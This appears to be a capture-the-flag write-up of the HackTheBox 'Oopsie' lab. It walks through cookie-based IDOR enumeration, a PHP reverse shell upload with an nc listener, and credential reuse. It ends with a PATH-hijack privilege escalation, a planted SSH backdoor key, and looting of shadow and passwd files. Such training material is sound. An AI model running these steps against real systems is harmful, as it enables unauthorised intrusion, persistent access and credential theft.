Box 2: HTB - Oopsie
It is rated a “Very easy” box on HTB, but it still gave me some trouble.
Enumeration
As a routine, I start with Nmap for port scanning and reconnaissance. For an explanation of nmap syntax and its parameters, visit https://explainshell.com/
nmap -sV -n -vv -Pn -T4 -p- -A 10.10.10.28 --open
The nmap result is very brief, not what I imagined. There are only two open ports for us to explore today: 22 (SSH) and 80 (HTTP).
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu))
There isn't much to do here yet. I run Hydra for authentication brute-forcing with rockyou.txt in the background, but unfortunately it finds nothing. Meanwhile, I also run dirsearch to enumerate the website's directories for interesting content. Additionally, I browse the site to inspect the menu and tabs and view the page source.
dirsearch -u http://10.10.10.28 -e html,js,php,old,bak
Options:
-u URL, --url=URL : Target URL
-e EXTENSIONS, --extensions=EXTENSIONS : Extension list separated by commas (Example: php,asp)
dirsearch detects some directories on this site, but they are inaccessible when I try to open them; they probably require authentication and authorization. There is a login page, but it redirects to the homepage when I try it.
However, when reading the page source, I find an odd path: /cdn-cgi/login/script.js
The page has quite a bit of content, so as an alternative you can start by filtering out the links to pages and scripts with curl:
curl 10.10.10.28 | grep -E --colour 'href|script'
Open the /cdn-cgi/login/ directory in your browser and the login page is right in front of you!
What next? I tried to brute-force the login with Hydra, but without success. Finally, some Google-fu revealed that the boxes in this HackTheBox track are related to each other, so let's try reusing the admin password from the previously compromised machine with common usernames such as administrator or admin. This was my first experience with that behaviour; keep it in mind for later boxes!
After logging in successfully, I go to the “Upload” tab first, because file upload is normally an attack vector for getting a reverse shell. However, it is not that easy.
Back in the “Account” tab, you see some information about the currently logged-in account. “Access ID” is 34322, but in the URL bar we also notice the parameter “id” equals 1, which corresponds to our current admin user. I checked the cookies and found something interesting: the “user” cookie is 34322 too.
Wfuzz
I have id=1 in the URL bar. If I change it to 2, I get nothing on the screen. It might be possible to brute-force the id values and display the user value of another user, such as a super admin account. We can do this with wfuzz. I'll fuzz the “id” parameter from 0 to 100.
wfuzz -c -z range,0-100 --hh 3595 -b role=admin -b user=34322 -u "http://10.10.10.28/cdn-cgi/login/admin.php?content=accounts&id=FUZZ"
Options:
-c : Output with colors
-u url : Specify a URL for the request
-z payload : Specify a payload for each FUZZ keyword used in the form of name[,parameter][,encoder]. A list of encoders can be used
-b cookie : Specify a cookie for the requests. Repeat option for various cookies
--hh N : Hide responses whose body is exactly N characters long
Why did I use --hh 3595 in this command? Let's request the URL again with id=2. That value is invalid, so the server responds with an essentially empty page. Every invalid “id” returns the same page with the same length, 3595 characters. We want to ignore those and focus only on responses with a different content length, i.e. valid “id” values. One caveat: measure the baseline from an id you know is invalid, and keep in mind that a valid account whose page happened to be exactly 3595 characters would be hidden too; wfuzz can also filter on word count (--hw) or line count (--hl) as a second signal. The wfuzz output then shows only the interesting hits.
Notice: What is Fuzzing?
To keep it simple, fuzzing can be considered “fancy brute-forcing” to some degree, but you can fuzz things you can't brute-force. Fuzzing uses security tools to automate feeding input into targets such as websites or software applications. It is extremely effective because computers perform laborious actions, such as finding hidden files and folders or trying many usernames and passwords, much faster than a human can (or is willing to). For more information about wfuzz, see its documentation; if you have problems installing it, check the project's documentation for a workaround. I hope it helps.
BurpSuite
Another way to do the above is BurpSuite Intruder. First, we use the Proxy to capture the traffic we send to the web server (configuring the browser to route requests through the proxy), then we send the captured request to Intruder for the attack.
Next, move to the “Payloads” tab to define the range of values we'll use for fuzzing. To create a list containing 0,1,...,100, you can use this one-liner: for i in $(seq 0 100); do echo $i; done > list.txt
“Load” this list into “Payload Sets” and click “Attack”. (Intruder's “Numbers” payload type can generate the same range without a file.)
In the results window, as with wfuzz, you only need to focus on HTTP responses with a different content length.
I tried everything in the list, and with id=30 we get the “super admin” Access ID.
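The same enumeration as an added shell example (it is not from the original write-up): a curl loop that reproduces wfuzz's --hh filter. curl_fetch sends the real request with the admin cookies shown above; fake_fetch is a constructed stub that mimics the box (only id 1 and id 30 return a populated account table) so the script runs offline. The function names, the stub's HTML and the choice of id=2 as the known-invalid baseline are my assumptions.

```sh
#!/bin/sh
# Added example: reproduce wfuzz's --hh filter with curl and a shell loop.
# Real fetcher: the request wfuzz sent, with the cookies from the write-up.
TARGET='http://10.10.10.28/cdn-cgi/login/admin.php?content=accounts&id='
curl_fetch() {
  curl -s -b 'role=admin; user=34322' "${TARGET}$1"
}

# Constructed stub standing in for the web server so the demo runs offline.
# Only ids 1 (our admin) and 30 (super admin) return a populated table;
# every other id returns the same "empty" page, as the box does.
fake_fetch() {
  case "$1" in
    1)  printf '%s' '<table><tr><td>Access ID</td><td>34322</td></tr><tr><td>Name</td><td>admin</td></tr></table>' ;;
    30) printf '%s' '<table><tr><td>Access ID</td><td>86575</td></tr><tr><td>Name</td><td>super admin</td></tr></table>' ;;
    *)  printf '%s' '<table><tr><td>Access ID</td><td></td></tr><tr><td>Name</td><td></td></tr></table>' ;;
  esac
}

# Length of one response body, like wfuzz's "Chars" column.
# Usage: body_length FETCHER ID
body_length() {
  "$1" "$2" | wc -c | tr -d ' '
}

# Baseline: measure an id you already know is invalid (the page used id=2).
baseline_length() {
  body_length "$1" 2
}

# Print every id whose body length differs from the baseline (= --hh).
# Usage: enumerate_ids FETCHER FIRST LAST BASELINE
enumerate_ids() {
  fetcher=$1; first=$2; last=$3; base=$4
  i=$first
  while [ "$i" -le "$last" ]; do
    len=$(body_length "$fetcher" "$i")
    if [ "$len" -ne "$base" ]; then
      printf '%s\n' "$i"
    fi
    i=$((i + 1))
  done
}

# Offline run against the stub; swap fake_fetch for curl_fetch on the box.
base=$(baseline_length fake_fetch)
enumerate_ids fake_fetch 0 100 "$base"   # prints 1 and 30
```

On the box, pass curl_fetch instead of fake_fetch. The caveat is the same as for wfuzz: the baseline must come from an id you know is invalid, and a valid account whose page happens to be exactly the baseline length would be hidden, so confirm hits with a second signal such as wfuzz's --hw (words) or --hl (lines) filters.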
Now we can change the “user” cookie to 86575 in the browser. After that, try the “Upload” tab again, and this time it is accessible!
Foothold
Next, we upload a reverse shell to the server and run it. If you use Kali Linux like me, a collection of PHP webshells is available in /usr/share/webshells/. You can list them with:
tree /usr/share/webshells
I picked php-reverse-shell.php this time. After changing the IP and port values, we upload the file, intercept the request, substitute the user cookie value as before, and click Upload.
That was a success, but where did the file go? Remember the dirsearch step: we found a directory called “uploads”. Requesting 10.10.10.28/uploads gives a 301, great! Now we can set up our listener and trigger the reverse shell.
sudo nc -lnvp <port number>
In the browser, open your reverse shell's location and press Enter to run it:
http://10.10.10.28/uploads/<your revere-shell file name>.php
The current shell is not a tty and is inconvenient, so let's upgrade it. We can use which python or which python3 to check whether python or python3 is available on this machine. Python3 is present in /bin/, so we run the command below to spawn an interactive tty shell:
python3 -c 'import pty; pty.spawn("/bin/bash")'
Lateral Movement
At this stage you can easily find the user.txt flag in /home/robert/. I won't disclose the flag in this write-up; you should enjoy finding it yourself. Next, it's a good idea to look around the web root /var/www/html. I found some script files there, and db.php is one of them. It contains robert's MySQL credentials; do they work elsewhere?
Yes, we still have another open service: SSH.
ssh robert@10.10.10.28
Press Enter and provide the password.
Privilege Escalation
Now that we are robert, again look around the home directory and see what we have. After looking through these files, we don't find anything juicy. I considered using find to list interesting files that robert has permission to access. After being stuck for some minutes, I ran id and found that robert is a member of a weird group called bugtracker.
So let's enumerate the filesystem to see whether this group has any special access.
find / -type f -group bugtracker 2> /dev/null
The only file found is /usr/bin/bugtracker. This executable is suspicious, so let's inspect it. I looked at its libraries with ldd, but there is nothing exploitable there since I can't hijack those paths. After some Google-fu I ran strings to get an idea of what the program has hard-coded, then ltrace to see exactly what the calls do. This was my first time with these two commands, so I don't have much information or a cheat sheet for them; research them later!
strings command explanation: https://www.lifewire.com/strings-linux-command-4093452
ltrace command explanation: https://man7.org/linux/man-pages/man1/ltrace.1.html
Looking at the output, a system() call runs the cat command, and the setuid line sets the UID to 0, which is root. The program invokes cat by its bare name rather than an absolute path, so the binary is resolved through the caller's PATH. By creating a malicious cat and prepending our working directory to PATH, we can abuse this misconfiguration and escalate to root.
Let's prepend the working directory to PATH, create the malicious binary and make it executable. Use /bin/sh as the payload: on Ubuntu it is dash, which keeps the effective UID, whereas bash drops setuid privileges unless started with -p.
export PATH=/tmp:$PATH
cd /tmp/
echo '/bin/sh' > cat
chmod +x cat
Finally, execute /usr/bin/bugtracker to get a root shell. Remember that we changed PATH so that cat now runs our payload, so use the absolute path /bin/cat to read file contents instead of plain cat. You will easily find the root.txt flag in /root/; explore it yourself.
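To show why the bare cat call is exploitable and what the fix looks like, here is an added shell example (not part of the original write-up and not the real bugtracker binary). It writes two stand-in scripts to a temporary directory, one that calls cat by name as the real program does and one hardened with a fixed PATH and an absolute /bin/cat, then runs both with a malicious cat prepended to PATH. The script names, the temporary directory layout and the echo payload (standing in for /bin/sh) are my assumptions; the setuid part is omitted because an unprivileged demo cannot reproduce it.

```sh
#!/bin/sh
# Added example: reproduce the bugtracker PATH mistake without a setuid binary.
WORK=$(mktemp -d)
HIJACK="$WORK/hijack"
mkdir "$HIJACK"

# Stand-in for /usr/bin/bugtracker: "cat <file>" resolved through PATH.
printf '#!/bin/sh\ncat "$1"\n' > "$WORK/bugtracker_vuln"
# Hardened stand-in: trusted PATH plus an absolute path to cat.
printf '#!/bin/sh\nPATH=/usr/bin:/bin\n/bin/cat "$1"\n' > "$WORK/bugtracker_fixed"
# Malicious cat, like the one the write-up drops in /tmp (echo instead of /bin/sh).
printf '#!/bin/sh\necho HIJACKED\n' > "$HIJACK/cat"
chmod +x "$WORK/bugtracker_vuln" "$WORK/bugtracker_fixed" "$HIJACK/cat"
# Constructed "report" the program is supposed to print.
printf 'confidential report\n' > "$WORK/report.txt"

# Vulnerable stand-in with the hijack dir first in PATH: our cat runs.
run_vulnerable() {
  PATH="$HIJACK:$PATH" "$WORK/bugtracker_vuln" "$WORK/report.txt"
}
# Same PATH, hardened stand-in: the malicious cat is never consulted.
run_hardened() {
  PATH="$HIJACK:$PATH" "$WORK/bugtracker_fixed" "$WORK/report.txt"
}

run_vulnerable   # HIJACKED
run_hardened     # confidential report
```

On the target the same lookup happens inside system(), which hands the command line to /bin/sh, so whichever cat appears first in the caller's PATH wins and runs with the setuid privileges. Calling cat by absolute path closes this hole only if the program also resets PATH; a setuid program should treat the whole inherited environment as attacker-controlled.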
I was afraid of losing this connection and considered setting up a backdoor, so I created a basic SSH key (ssh-keygen) and added it to root's authorized_keys file. Now I can get in as root any time. On your own machine, run ssh-keygen to generate an SSH key pair; two files are created: id_rsa (private key) and id_rsa.pub (public key). Copy the public key into the authorized_keys file in the SSH directory ~/.ssh/ on the victim machine (10.10.10.28). Then I tried connecting from my Kali machine to this box with the private key I had just created, but the first attempt failed.
After some Googling I found the reason: ssh refuses to use a private key whose permissions are too open. I fixed it with chmod 600 id_rsa. See a reference on Linux file permissions if this is unfamiliar.
Now it's time to loot, so I pull the shadow and passwd files for credentials. As noted above, they may be useful for the next few boxes!
There is a file inside the .config directory with some additional credentials. Based on the last box, I'll add everything I found to my credential file, because password reuse may be a theme here!
Finally, this is the 2nd box on my journey toward the OSCP exam. I'll try to add more details when possible.
THANKS FOR READING AND SUPPORTING!